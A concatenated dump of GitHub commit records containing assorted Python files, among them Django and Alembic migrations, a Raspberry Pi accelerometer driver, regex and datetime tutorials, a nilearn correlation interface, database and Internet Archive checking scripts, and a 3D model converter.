for idx in xrange(1000):
f.attrs['%d'%idx] = 1
def list_attributes():
with h5py.File(FNAME, 'r') as f:
names = list(f.attrs)
if __name__ == '__main__':
make_file()
thread = Thread(target=list_attributes)
thread.start()
list_attributes()
thread.join()
| bsd-3-clause | Python |
|
b1517f63c3aa549170d77c6fb3546901fdbe744b | Remove the hard-coded extra 'cv' and 'program' fields | datamade/yournextmp-popit,datamade/yournextmp-popit,datamade/yournextmp-popit,datamade/yournextmp-popit,datamade/yournextmp-popit | candidates/migrations/0017_remove_cv_and_program_fields.py | candidates/migrations/0017_remove_cv_and_program_fields.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('candidates', '0016_migrate_data_to_extra_fields'),
]
operations = [
migrations.RemoveField(
model_name='personextra',
name='cv',
),
migrations.RemoveField(
model_name='personextra',
name='program',
),
]
| agpl-3.0 | Python |
|
5789cc585a69f3c73e63a36d99c02b119f593bc9 | Create accelerometer.py | somchaisomph/RPI.GPIO.TH | gadgets/navigators/accelerometer.py | gadgets/navigators/accelerometer.py | from spi.rpi_spi import rpi_spi_dev
from spi.adc.MCP3208 import MCP3208
class ACCEL_GY61():
# use chip ADXL335
def __init__(self,device=0,x_channel=0,y_channel=1,z_channel=2):
self.spi = rpi_spi_dev(device).spi
self.mcp = None
if self.spi is not None:
self.mcp = MCP3208(self.spi)
self.vrx_channel = x_channel
self.vry_channel = y_channel
self.vrz_channel = z_channel
def get_data(self):
if self.mcp is None:
return (0,0)
xpos = self.mcp.read_adc(self.vrx_channel)
ypos = self.mcp.read_adc(self.vry_channel)
zpos = self.mcp.read_adc(self.vrz_channel)
return (xpos,ypos,zpos)
| mit | Python |
|
c0da1aecb6e663d9586238e9d8f2b7a8abb40cf7 | Add transform module to place ongoing built in transformmers | timothycrosley/hug,MuhammadAlkarouri/hug,MuhammadAlkarouri/hug,MuhammadAlkarouri/hug,timothycrosley/hug,timothycrosley/hug | hug/transform.py | hug/transform.py | """hug/transform.py
Defines Hug's built-in output transforming functions
Copyright (C) 2015 Timothy Edmund Crosley
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or
substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED
TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
def content_type(transformers, default=None):
'''Returns a different transformer depending on the content type passed in.
If none match and no default is given no transformation takes place.
should pass in a dict with the following format:
{'[content-type]': transformation_action,
...
}
'''
def transform(data, request):
transformer = transformers.get(request.content_type.split(';')[0], default)
if not transformer:
return data
return transformer(data)
return transform
| mit | Python |
|
3ed52b0a51ccb18b053ca69984d8072e1ffdec25 | Add 328 | cyandterry/Python-Study | Ninja/Leetcode/328_Odd_Even_Linked_List.py | Ninja/Leetcode/328_Odd_Even_Linked_List.py | """
Given a singly linked list, group all odd nodes together followed by the even nodes. Please note here we are talking about the node number and not the value in the nodes.
You should try to do it in place. The program should run in O(1) space complexity and O(nodes) time complexity.
Example 1:
Input: 1->2->3->4->5->NULL
Output: 1->3->5->2->4->NULL
Example 2:
Input: 2->1->3->5->6->4->7->NULL
Output: 2->3->6->7->1->5->4->NULL
Note:
The relative order inside both the even and odd groups should remain as it was in the input.
The first node is considered odd, the second node even and so on ...
"""
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
def oddEvenList(self, head: ListNode) -> ListNode:
if not head:
return None
odd_current = head
even_current = head.next
even_head = head.next
current = head
i = 0
while current:
if i % 2 == 0:
even_current.next = current
even_current = even_current.next
else:
odd_current.next = current
odd_current = odd_current.next
i += 1
current = current.next
return head
| mit | Python |
|
732852ae19d3e7edbbfda9394808ca245456a69b | complete re and datetime sample | r569594043/PythonBeginner | 08.StandardLibrary.py | 08.StandardLibrary.py | #-*- encoding: utf-8 -*-
'''
Python Standard Library
See Also: http://docs.python.org/3/library/index.html
'''
import re
'''
re
See Also: http://docs.python.org/3/library/re.html
'''
'''
m = re.search('H(.*?)o', 'I Say: Hello World Hello World Hello World')
if m:
print(m.group(0)) # Hello
print(m.group(1)) # ell
# Error
# print(m.group(2))
else:
print('no match')
m = re.match('H(.*?)o', 'I Say: Hello World Hello World Hello World')
if m:
print(m.group(0))
print(m.group(1))
else:
print('no match') # no match
m = re.match('H(.*?)o', 'Hello World Hello World Hello World')
if m:
print(m.group(0)) # Hello
print(m.group(1)) # ell
else:
print('no match')
# re.I or re.IGNORECASE
m = re.search('h(.*?)o', 'I Say: Hello World Hello World Hello World')
if m:
print(m.group(0))
print(m.group(1))
else:
print('no match') # no match
m = re.search('h(.*?)o', 'I Say: Hello World Hello World Hello World', re.I)
if m:
print(m.group(0)) # Hello
print(m.group(1)) # ell
else:
print('no match')
# re.M or re.MULTILINE
str = """
I Say:
Hello world,
Hello world,
Hello world,
"""
m = re.search('^h(.*?)o', str, flags = re.M | re.I)
if m:
print(m.group(0)) # Hello
print(m.group(1)) # ell
else:
print('no match')
m = re.search('^H(.*?)o', str, re.I)
if m:
print(m.group(0))
print(m.group(1))
else:
print('no match') # no match
print(re.sub('h(.*?)o', 'hey', 'I Say: Hello World Hello World Hello World', 2, re.I)) # I Say: hey World hey World Hello World
print(re.split('h.*?o', 'I Say: Hello World Hello World Hello World', 2, re.I)) # ['I Say: ', ' World ', ' World Hello World']
l = re.findall('h.*?o', 'I Say: Hello World Hello World Hello World', re.I)
for m in l:
print(m)
# Hello
# Hello
# Hello
re_hello = re.compile('h.*?o', re.I)
l = re_hello.findall('I Say: Hello World Hello World Hello World')
for m in l:
print(m)
# Hello
# Hello
# Hello
str = 'my str is this.\n'
# regex: this\.\n
m = re.search('this\\.\\n', str)
if m:
print(m.group(0)) # this.\n
else:
print('no match')
m = re.search(r'this\.\n', str)
if m:
print(m.group(0)) # this.\n
else:
print('no match')
# re.X or re.VERBOSE
m = re.search(r"""
this # match this
\. # match .
\n # match break line
""", str, re.X)
if m:
print(m.group(0)) # this.\n
else:
print('no match')
'''
import time
import datetime
'''
strftime() and strptime() Behavior
See Also: http://docs.python.org/3/library/datetime.html#strftime-and-strptime-behavior
'''
print(time.strptime('2014-01-09 17:33:30', '%Y-%m-%d %H:%M:%S')) # time.struct_time(tm_year=2014, tm_mon=1, tm_mday=9, tm_hour=17, tm_min=33, tm_sec=30, tm_wday=3, tm_yday=9, tm_isdst=-1)
print(datetime.datetime.strftime(datetime.datetime.now(), '%Y-%m-%d %H:%M:%S')) # 2014-01-09 17:45:25
t = time.strptime('2014-01-09 17:33:30', '%Y-%m-%d %H:%M:%S')
print(time.strftime('%m/%d/%y %I:%M:%S %p', t)) # 01/09/14 05:33:30 PM | apache-2.0 | Python |
|
bbd43a3af7fdd5eacea13fae9c1670aa5436e7bc | add data not sufficient exception that shall be raised when data provided to a feature is not sufficient | DevMine/devmine-core | features/exception_data_not_suffient.py | features/exception_data_not_suffient.py | """This exception shall be raised in case the data provided to a feature is not
sufficient"""
class DataNotSufficientError(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
| bsd-3-clause | Python |
|
e41d4fa8a61126495dc5cc42575fa5ce5b89f1b7 | add spiel on whitespace | ireapps/coding-for-journalists,ireapps/coding-for-journalists,ireapps/coding-for-journalists | 1_start/whitespace.py | 1_start/whitespace.py | # FUN WITH WHITESPACE IN PYTHON
# Whitespace is critical in Python. Unlike some other scripting languages,
# which use characters to tell the interpreter where functions and loops
# end, Python uses structured indentation for new lines, making "blocks" of
# code.
my_string = 'New York'
print "Start spreading the news,"
if my_string == 'New York':
print "I'm leaving today,"
print "I want to be a part of it,"
for num in range(0,2):
print my_string
else:
print "you clearly don't know how this song goes. {}?".format(my_string)
# What do you think the above does? Let's step through it.
# (Notice how blank lines between code is A-OK.)
# Some other places indentation and whitespace don't matter much:
# When assigning items to a list or a string; the below is ugly, but sometimes
# it's more readable in a script to define things on different lines.
list_of_cities = [
'Buffalo',
'Key West',
'Fort Collins', 'Bakersfield' ]
wordy_string = "Four score and seven years ago, our fathers brought" \
" forth on this continent ... hmm. I" \
" am desperately trying to remember what Abraham Lincoln" \
" said, because it was one of the most important and" \
" and influentual speeches in modern history; I've even" \
" been to Gettysburg. Wow, this is pretty embarrasing."
# Tabs and spaces. Don't mix them. The interpreter will choke on it. Style
# dictates that you use four spaces instead of tabs. I generally set up my
# text editor to replace tabs on the fly or do it after I'm done with my
# script, because I much prefer hitting tab once instead of space four times.
print "Start spreading the news,"
if my_string == 'New York':
print "I'm leaving today,"
print "I want to be a part of it,"
for num in range(0,2):
print my_string
else:
print "you clearly don't know how this song goes. {}?".format(my_string)
# The above looks fine, right? You will get an IndentationError. Most text
# editors have a function
| mit | Python |
|
9760f81ce6cc7783f8fb097931e98f8234307a00 | add nilearn interface for correlations | HBClab/NiBetaSeries,HBClab/NiBetaSeries | src/nibetaseries/interfaces/nilearn.py | src/nibetaseries/interfaces/nilearn.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
from nipype.interfaces.nilearn import NilearnBaseInterface
from nipype.interfaces.base import (
BaseInterfaceInputSpec, TraitedSpec,
File, SimpleInterface
)
class AtlasConnectivityInputSpec(BaseInterfaceInputSpec):
timeseries_file = File(exists=True, mandatory=True,
desc='The 4d file being used to extract timeseries data')
atlas_file = File(exists=True, mandatory=True,
desc='The atlas image with each roi given a unique index')
atlas_lut = File(exists=True, mandatory=True,
desc='The atlas lookup table to match the atlas image')
class AtlasConnectivityOutputSpec(TraitedSpec):
correlation_matrix = File(exists=True, desc='roi-roi fisher z transformed correlation matrix')
class AtlasConnectivity(NilearnBaseInterface, SimpleInterface):
"""Calculates correlations between regions of interest"""
input_spec = AtlasConnectivityInputSpec
output_spec = AtlasConnectivityOutputSpec
def _run_interface(self, runtime):
from nilearn.input_data import NiftiLabelsMasker
from nilearn.connectome import ConnectivityMeasure
import numpy as np
import pandas as pd
import os
# extract timeseries from every label
masker = NiftiLabelsMasker(labels_img=self.inputs.atlas_file, standardize=True,
memory='nilearn_cache', verbose=1)
timeseries = masker.fit_transform(self.inputs.timeseries_file)
# create correlation matrix
correlation_measure = ConnectivityMeasure(kind='correlation')
correlation_matrix = correlation_measure.fit_transform([timeseries])[0]
np.fill_diagonal(correlation_matrix, np.NaN)
# add the atlas labels to the matrix
atlas_lut_df = pd.read_csv(self.inputs.atlas_lut, sep='\t')
regions = atlas_lut_df['regions']
correlation_matrix_df = pd.DataFrame(correlation_matrix, index=regions, columns=regions)
# do a fisher's r -> z transform
fisher_z_matrix_df = correlation_matrix_df.apply(lambda x: np.log((1+x) / (1-x)) * 0.5)
# write out the file.
out_file = os.path.join(runtime.cwd, 'fisher_z_correlation.tsv')
fisher_z_matrix_df.to_csv(out_file, sep='\t')
# save the filename in the outputs
self._results['correlation_matrix'] = out_file
return runtime
| mit | Python |
|
eee7862cead703d11405276c1a399466c9f102c5 | add shell.py | lachie83/contrail-kubernetes,rombie/contrail-kubernetes,pedro-r-marques/contrail-kubernetes,lachie83/contrail-kubernetes,pedro-r-marques/contrail-kubernetes,pupapaik/contrail-kubernetes,Juniper/contrail-kubernetes,pedro-r-marques/contrail-kubernetes,WIZARD-CXY/contrail-kubernetes,Juniper/contrail-kubernetes,Juniper/contrail-kubernetes,WIZARD-CXY/contrail-kubernetes,WIZARD-CXY/contrail-kubernetes,pupapaik/contrail-kubernetes,rombie/contrail-kubernetes,WIZARD-CXY/contrail-kubernetes,Juniper/contrail-kubernetes,lachie83/contrail-kubernetes,pupapaik/contrail-kubernetes,lachie83/contrail-kubernetes,rombie/contrail-kubernetes,pedro-r-marques/contrail-kubernetes,pupapaik/contrail-kubernetes | scripts/opencontrail-kubelet/opencontrail_kubelet/shell.py | scripts/opencontrail-kubelet/opencontrail_kubelet/shell.py | #
# Copyright (c) 2015 Juniper Networks, Inc.
#
import subprocess
import logging
class Shell:
# Run a shell command. Log the command run and its output.
@staticmethod
def run(str):
logging.debug('sh: %s' % str)
cmd = subprocess.check_output(str, shell=True)
logging.debug('output: %s' % cmd.rstrip())
return cmd
| apache-2.0 | Python |
|
73369f23bd008331884d5644ba9923aae4809756 | add offline db comparison tool | akrherz/iem,akrherz/iem,akrherz/iem,akrherz/iem,akrherz/iem | scripts/DEV/postgresql/compare_counts.py | scripts/DEV/postgresql/compare_counts.py | import psycopg2
oldpg = psycopg2.connect(database='postgis', host='localhost', port=5555, user='mesonet')
cursor = oldpg.cursor()
dbs = []
cursor.execute("""SELECT datname FROM pg_database
WHERE datistemplate = false ORDER by datname""")
for row in cursor:
dbs.append(row[0])
for db in dbs:
if db <= 'cscap':
continue
print("running %s" % (db,))
oldpg = psycopg2.connect(database=db, host='localhost', port=5555, user='mesonet')
ocursor = oldpg.cursor()
newpg = psycopg2.connect(database=db, host='localhost', port=5556, user='mesonet')
ncursor = newpg.cursor()
tables = []
ocursor.execute("""SELECT table_name
FROM information_schema.tables WHERE table_schema = 'public'
ORDER BY table_name""")
for row in ocursor:
tables.append(row[0])
for table in tables:
ocursor.execute("""SELECT count(*) from """+table)
ncursor.execute("""SELECT count(*) from """+table)
orow = ocursor.fetchone()
nrow = ncursor.fetchone()
if orow[0] != nrow[0]:
print("%s->%s old:%s new:%s" % (db, table, orow[0], nrow[0]))
| mit | Python |
|
b61a423497c21fa4df818c8b5e5eaea788eb84ea | add ia_cdx_checker | ianmilligan1/WAHR,web-archive-group/WAHR,ianmilligan1/WAHR,ianmilligan1/WAHR,web-archive-group/WAHR,web-archive-group/WAHR,web-archive-group/WAHR,ianmilligan1/WAHR,web-archive-group/WAHR | scripts/ia_cdx_checker/ia_cdx_checker.py | scripts/ia_cdx_checker/ia_cdx_checker.py | #!/usr/bin/env python
"""
$ python ia_cdx_checker.py elxn42-tweets-urls-fixed-uniq-no-count.txt | cat > elx42_urls_in_ia.txt
"""
from __future__ import print_function
import sys
import json
import fileinput
import io
from urllib2 import Request, urlopen, URLError, HTTPError
for line in fileinput.input():
elx42_url = line.rstrip('\n')
try:
url = 'http://web.archive.org/cdx/search/cdx?url=' + elx42_url + '&output=json&limit=-2'
request = Request(url, headers={'User-Agent': "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"})
jsonData = urlopen(request)
data = json.load(jsonData)
first_date = data[1][1]
second_date = data[2][1]
if first_date.startswith('201508'):
print(elx42_url)
if first_date.startswith('201509'):
print(elx42_url)
if first_date.startswith('201510'):
print(elx42_url)
if first_date.startswith('201511'):
print(elx42_url)
if first_date.startswith('201512'):
print(elx42_url)
if second_date.startswith('201508'):
print(elx42_url)
if second_date.startswith('201509'):
print(elx42_url)
if second_date.startswith('201510'):
print(elx42_url)
if second_date.startswith('201511'):
print(elx42_url)
if second_date.startswith('201512'):
print(elx42_url)
except HTTPError as e:
status_code = e.code
except IndexError as d:
index_error = d
except ValueError as f:
value_error = f
| mit | Python |
|
f468ddbcf6bc752a3a7af877f5453271f7f2ea45 | add model processor script | whitingjp/whitgl,whitingjp/whitgl,whitingjp/whitgl,whitingjp/whitgl | scripts/process_model.py | scripts/process_model.py | #!/usr/bin/python
import struct
import argparse
import sys
import os.path
def process_mtl(filename):
materials = []
file = open(filename)
for line in file:
tokens = line.split()
if(len(tokens) == 0):
continue
ident = tokens.pop(0)
if(ident == 'newmtl'):
m = {}
m['name'] = tokens[0]
m['outer'] = (1,1,1)
m['inner'] = (1,1,1)
materials.append(m)
if(ident == 'Kd'):
materials[-1]['outer'] = (float(tokens[0]),float(tokens[1]),float(tokens[2]))
if(ident == 'Ks'):
materials[-1]['inner'] = (float(tokens[0]),float(tokens[1]),float(tokens[2]))
return materials
def process_obj(filename):
file = open(filename)
vertices = []
faces = []
materials = []
default_material = {}
default_material['name'] = 'default'
default_material['outer'] = (1,0.1,1)
default_material['inner'] = (1,0.5,1)
materials.append(default_material)
current_material = 0
for line in file:
tokens = line.split()
if(len(tokens) == 0):
continue
ident = tokens.pop(0)
if(ident == 'v'):
vertex = (float(tokens[0]),float(tokens[1]),float(tokens[2]));
vertices.append(vertex)
if(ident == 'f'):
face = (int(tokens[0].split('/')[0]),int(tokens[1].split('/')[0]),int(tokens[2].split('/')[0]),current_material)
faces.append(face)
if len(tokens) == 4:
face = (int(tokens[2].split('/')[0]),int(tokens[3].split('/')[0]),int(tokens[0].split('/')[0]),current_material)
faces.append(face)
if(ident == 'mtllib'):
path = os.path.join(os.path.dirname(filename), tokens[0])
materials += process_mtl(path)
if(ident == 'usemtl'):
current_material = 0
for i in range(len(materials)):
if materials[i]['name'] == tokens[0]:
current_material = i
return vertices, faces, materials
def main():
parser = argparse.ArgumentParser(description='Convert a wavefront obj file to use in slicer.')
parser.add_argument('src', help='obj file name')
parser.add_argument('dst', help='wmd file name')
args = parser.parse_args()
print("Converting %s to %s" % (args.src, args.dst))
vertices, faces, materials = process_obj(args.src)
vertices_size = len(faces)*3*3*4;
colours_size = vertices_size * 2;
size = vertices_size + colours_size
print ("Vertices %d size %d" % (len(faces)*3, size))
out = open(args.dst, 'wb')
out.write(struct.pack('i', size))
for face in faces:
m = materials[face[3]]
for index in face[:3]:
vertex = vertices[index-1]
for f in vertex:
out.write(struct.pack('f', f))
for c in m['outer']:
out.write(struct.pack('f', c**(1/2.2)))
for c in m['inner']:
out.write(struct.pack('f', c**(1/2.2)))
if __name__ == "__main__":
main()
| mit | Python |
|
22ba7e7bfce711257f055733ecd260b8e61ced91 | Add example script to parse CapnProto traces | mdlui/Sigil2,mikelui/Sigil2,mdlui/Sigil2,mikelui/Sigil2,mikelui/Sigil2,VANDAL/sigil2,mdlui/Sigil2,VANDAL/sigil2,mikelui/Sigil2,VANDAL/sigil2,mdlui/Sigil2 | src/Backends/SynchroTraceGen/scripts/stgen_capnp_parser.py | src/Backends/SynchroTraceGen/scripts/stgen_capnp_parser.py | #!/bin/python
"""
This script demonstrates parsing a CapnProto SynchroTrace event trace.
The 'STEventTrace.capnp' file must exist in the sys.path.
Add its directory to the PYTHONPATH environmental variable or
copy it to the current working directory.
The pycapnp library is required:
See http://jparyani.github.io/pycapnp/install.html for further details.
Generate the *.capnp.bin file with:
bin/sigil2 --backend=stgen -l capnp --executable=...
Run this script as:
./stgen_capnp_parser.py sigil.events-#.capnp.bin.gz
OR
gunzip sigil.events-#.capnp.bin.gz
./stgen_capnp_parser.py sigil.events-#.capnp.bin
"""
import sys
import os
from warnings import warn
import capnp
import STEventTrace_capnp
def processSTEventTrace(file):
for stream in (STEventTrace_capnp.EventStream
.read_multiple_packed(file, traversal_limit_in_words=2**63)):
for event in stream.events:
which = event.which()
if which == 'comp':
event.comp.iops # IOPs value
event.comp.flops # FLOPs value
event.comp.writes # writes value
event.comp.reads # reads value
for write in event.comp.writeAddrs:
write.start # start of address range
write.end # end of address range
for read in event.comp.writeAddrs:
read.start # start of address range
read.end # end of address range
elif which == 'comm':
for edge in event.comm.edges:
# the thread-event tuple that generated
# this communication edge
edge.producerThread
edge.producerEvent
for addr in edge.addrs:
addr.start # start of address range
addr.end # end of address range
elif which == 'sync':
if event.sync.type == 'spawn':
event.sync.id # spawned thread id
elif event.sync.type == 'join':
event.sync.id # joined thread id
elif event.sync.type == 'barrier':
event.sync.id # barrier id
elif event.sync.type == 'sync':
event.sync.id
elif event.sync.type == 'lock':
event.sync.id # lock mutex
elif event.sync.type == 'unlock':
event.sync.id # unlock mutex
elif event.sync.type == 'condWait':
event.sync.id # condition variable
elif event.sync.type == 'condSignal':
event.sync.id # condition variable
elif event.sync.type == 'condBroadcast':
event.sync.id # condition variable
elif event.sync.type == 'spinLock':
event.sync.id # lock id
elif event.sync.type == 'spinUnlock':
event.sync.id # unlock id
else:
raise Exception('unhandled sync event')
elif which == 'marker':
# the number of instructions since the last marker
event.marker.count
if __name__ == '__main__':
filepath = sys.argv[1]
name, ext = os.path.splitext(filepath)
if ext == '.gz':
# https://github.com/jparyani/pycapnp/issues/80
f = os.popen('cat ' + filepath + ' | gzip -d')
else:
if ext != '.bin':
warn('not a .bin file')
f = open(filepath, 'r')
processSTEventTrace(f)
| bsd-3-clause | Python |
|
a1d2023aa6e8baa89747497e69a0a79fe1a27bdd | Drop ProjectPlan table | dropbox/changes,dropbox/changes,wfxiang08/changes,bowlofstew/changes,bowlofstew/changes,dropbox/changes,wfxiang08/changes,dropbox/changes,wfxiang08/changes,wfxiang08/changes,bowlofstew/changes,bowlofstew/changes | migrations/versions/36d7c98ddfee_drop_projectplan_table.py | migrations/versions/36d7c98ddfee_drop_projectplan_table.py | """Drop ProjectPlan table
Revision ID: 36d7c98ddfee
Revises: 12569fada93
Create Date: 2014-10-14 11:25:48.151275
"""
# revision identifiers, used by Alembic.
revision = '36d7c98ddfee'
down_revision = '12569fada93'
from alembic import op
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_table('project_plan')
def downgrade():
raise NotImplementedError
| apache-2.0 | Python |
|
730b208b490290c84bde8aa017a8f556d457d729 | add list to integer | dragonwolverines/DataStructures,dragonwolverines/DataStructures,dragonwolverines/DataStructures | resource-4/combinatorics/digits/list-to-integer.py | resource-4/combinatorics/digits/list-to-integer.py | def listToInt(listt,base=2):
return reduce(lambda x,y:base*x+y,reversed(listt), 0)
| bsd-2-clause | Python |
|
61e16d12bcd945b44896e87bcb21ce750cd507e5 | Add `bindings` module | NicolasT/tee-n-splice | bindings.py | bindings.py | '''
Bindings to the `tee` and `splice` system calls
'''
import os
import ctypes
import ctypes.util
#pylint: disable=C0103,R0903,R0913
__all__ = ['tee', 'splice']
_c_loff_t = ctypes.c_uint64
_libc = ctypes.CDLL(ctypes.util.find_library('c'), use_errno=True)
class Tee(object):
'''Binding to `tee`'''
def __init__(self):
c_tee = _libc.tee
c_tee.argtypes = [
ctypes.c_int,
ctypes.c_int,
ctypes.c_size_t,
ctypes.c_uint
]
c_tee.restype = ctypes.c_ssize_t
self._c_tee = c_tee
def __call__(self, fd_in, fd_out, len_, flags):
'''See `man 2 tee`
File-descriptors can be file-like objects with a `fileno` method, or
integers.
Flags can be an integer value, or a list of flags (exposed on
`splice`).
'''
if not isinstance(flags, (int, long)):
c_flags = ctypes.c_uint(reduce(lambda a, b: a | b, flags, 0))
else:
c_flags = ctypes.c_uint(flags)
c_fd_in = ctypes.c_int(getattr(fd_in, 'fileno', lambda: fd_in)())
c_fd_out = ctypes.c_int(getattr(fd_out, 'fileno', lambda: fd_out)())
c_len = ctypes.c_size_t(len_)
res = self._c_tee(c_fd_in, c_fd_out, c_len, c_flags)
if res == -1:
errno_ = ctypes.get_errno()
raise OSError(errno_, os.strerror(errno_))
return res
tee = Tee()
del Tee
class Splice(object):
'''Binding to `splice`'''
# From `bits/fcntl-linux.h`
SPLICE_F_MOVE = 1
SPLICE_F_NONBLOCK = 2
SPLICE_F_MORE = 4
SPLICE_F_GIFT = 8
def __init__(self):
c_splice = _libc.splice
c_loff_t_p = ctypes.POINTER(_c_loff_t)
c_splice.argtypes = [
ctypes.c_int, c_loff_t_p,
ctypes.c_int, c_loff_t_p,
ctypes.c_size_t,
ctypes.c_uint
]
c_splice.restype = ctypes.c_ssize_t
self._c_splice = c_splice
def __call__(self, fd_in, off_in, fd_out, off_out, len_, flags):
'''See `man 2 splice`
File-descriptors can be file-like objects with a `fileno` method, or
integers.
Flags can be an integer value, or a list of flags (exposed on this
object).
Returns a tuple of the result of the `splice` call, the output value of
`off_in` and the output value of `off_out` (or `None`, if applicable).
'''
# TODO: Passing non-`None` values for the offsets (and the corresponding
# effect on the result of this function call) is untested.
if not isinstance(flags, (int, long)):
c_flags = ctypes.c_uint(reduce(lambda a, b: a | b, flags, 0))
else:
c_flags = ctypes.c_uint(flags)
c_fd_in = ctypes.c_int(getattr(fd_in, 'fileno', lambda: fd_in)())
c_fd_out = ctypes.c_int(getattr(fd_out, 'fileno', lambda: fd_out)())
c_off_in = \
ctypes.byref(_c_loff_t(off_in)) if off_in is not None else None
c_off_out = \
ctypes.byref(_c_loff_t(off_out)) if off_out is not None else None
c_len = ctypes.c_size_t(len_)
res = self._c_splice(
c_fd_in, c_off_in, c_fd_out, c_off_out, c_len, c_flags)
if res == -1:
errno_ = ctypes.get_errno()
raise OSError(errno_, os.strerror(errno_))
return (
res,
c_off_in.contents if c_off_in is not None else None,
c_off_out.contents if c_off_out is not None else None)
splice = Splice()
del Splice
| apache-2.0 | Python |
|
5e3bc841800bb4e92df5871d97559810d67d7660 | Create __init__.py | lyelindustries/IPM | cmd/__init__.py | cmd/__init__.py | __version__ = '0.0.0'
| mit | Python |
|
2acb5d6da30c9b25eb05ca7a0da77bdaa45499a5 | Create cod_variable.py | nrikee/Compresion-indices | cod_variable.py | cod_variable.py | def encode_single_vb(n):
byts = []
while True:
byts.append(n % 128)
if n < 128:
break
n //= 128
byts = byts[::-1]
byts[-1] += 128
return [bin(n)[2:] for n in byts]
def encode_vb(numbers):
bytestream = []
for n in numbers:
bytestream.extend(encode_single_vb(n))
return bytestream
| mit | Python |
|
624c133ba1afdb904e31742ac5f00a76859ab5b7 | Write some docs for the response object | bufferapp/buffer-python,vtemian/buffpy | buffer/response.py | buffer/response.py | class ResponseObject(dict):
'''
Simple data structure that convert any dict to an empty object
where all the atributes are the keys of the dict, but also preserve a dict
behavior
e.g:
obj = ResponseObject({'a':'b'})
obj.key = 'value'
obj.a => 'b'
obj => {'a': 'b', 'key': 'value'}
'''
def __init__(self, *args, **kwargs):
super(ResponseObject, self).__init__(*args, **kwargs)
self.__dict__ = self._check_for_inception(self)
def _check_for_inception(self, root_dict):
'''
Used to check if there is a dict in a dict
'''
for key in root_dict:
if type(root_dict[key]) == dict:
root_dict[key] = ResponseObject(root_dict[key])
return root_dict
def set_for(self, cls):
cls.__dict__ = self.__dict__
| class ResponseObject(dict):
def __init__(self, *args, **kwargs):
super(ResponseObject, self).__init__(*args, **kwargs)
self.__dict__ = self._check_for_inception(self)
def _check_for_inception(self, root_dict):
for key in root_dict:
if type(root_dict[key]) == dict:
root_dict[key] = ResponseObject(root_dict[key])
return root_dict
def set_for(self, cls):
cls.__dict__ = self.__dict__
| mit | Python |
d22242bda1a15cf59e395177c44b6d2701a5e246 | add code to replicate issue #376 | mmottahedi/nilmtk,nilmtk/nilmtk,josemao/nilmtk,pauldeng/nilmtk,AlexRobson/nilmtk,jaduimstra/nilmtk,HarllanAndrye/nilmtk,nilmtk/nilmtk | tests_on_large_datasets/redd_house3_f1_score.py | tests_on_large_datasets/redd_house3_f1_score.py | from __future__ import print_function, division
from nilmtk import DataSet, HDFDataStore
from nilmtk.disaggregate import fhmm_exact
from nilmtk.metrics import f1_score
from os.path import join
import matplotlib.pyplot as plt
"""
This file replicates issue #376 (which should now be fixed)
https://github.com/nilmtk/nilmtk/issues/376
"""
data_dir = '/data/REDD'
building_number = 3
disag_filename = join(data_dir, 'disag-fhmm' + str(building_number) + '.h5')
data = DataSet(join(data_dir, 'redd.h5'))
print("Loading building " + str(building_number))
elec = data.buildings[building_number].elec
top_train_elec = elec.submeters().select_top_k(k=5)
fhmm = fhmm_exact.FHMM()
fhmm.train(top_train_elec)
output = HDFDataStore(disag_filename, 'w')
fhmm.disaggregate(elec.mains(), output)
output.close()
### f1score fhmm
disag = DataSet(disag_filename)
disag_elec = disag.buildings[building_number].elec
f1 = f1_score(disag_elec, elec)
f1.index = disag_elec.get_labels(f1.index)
f1.plot(kind='barh')
plt.ylabel('appliance');
plt.xlabel('f-score');
plt.title("FHMM");
plt.savefig(join(data_dir, 'f1-fhmm' + str(building_number) + '.png'))
disag.store.close()
####
print("Finishing building " + str(building_number))
| apache-2.0 | Python |
|
80bf877306a78a63cf7752975f980a2d435f7d5e | Add standard services and lazy service wrapper | polyaxon/polyaxon,polyaxon/polyaxon,polyaxon/polyaxon | polyaxon/libs/services.py | polyaxon/libs/services.py | import inspect
import itertools
import logging
from django.utils.functional import empty, LazyObject
from libs.imports import import_string
logger = logging.getLogger(__name__)
class InvalidService(Exception):
pass
class Service(object):
__all__ = ()
def validate(self):
"""Validate the settings for this backend (i.e. such as proper connection info).
Raise ``InvalidService`` if there is a configuration error.
"""
def setup(self):
"""Initialize this service."""
class LazyServiceWrapper(LazyObject):
"""Lazyily instantiates a Polyaxon standard service class.
>>> LazyServiceWrapper(BaseClass, 'path.to.import.Backend', {})
Provides an ``expose`` method for dumping public APIs to a context, such as module locals:
>>> service = LazyServiceWrapper(...)
>>> service.expose(locals())
"""
def __init__(self, backend_base, backend_path, options):
super(LazyServiceWrapper, self).__init__()
self.__dict__.update(
{
'backend_base': backend_base,
'_backend_path': backend_path,
'_options': options,
}
)
def __getattr__(self, name):
if self._wrapped is empty:
self._setup()
return getattr(self._wrapped, name)
def _setup(self):
backend = import_string(self._backend_path)
assert issubclass(backend, Service)
instance = backend(**self._options)
self._wrapped = instance
def expose(self, context):
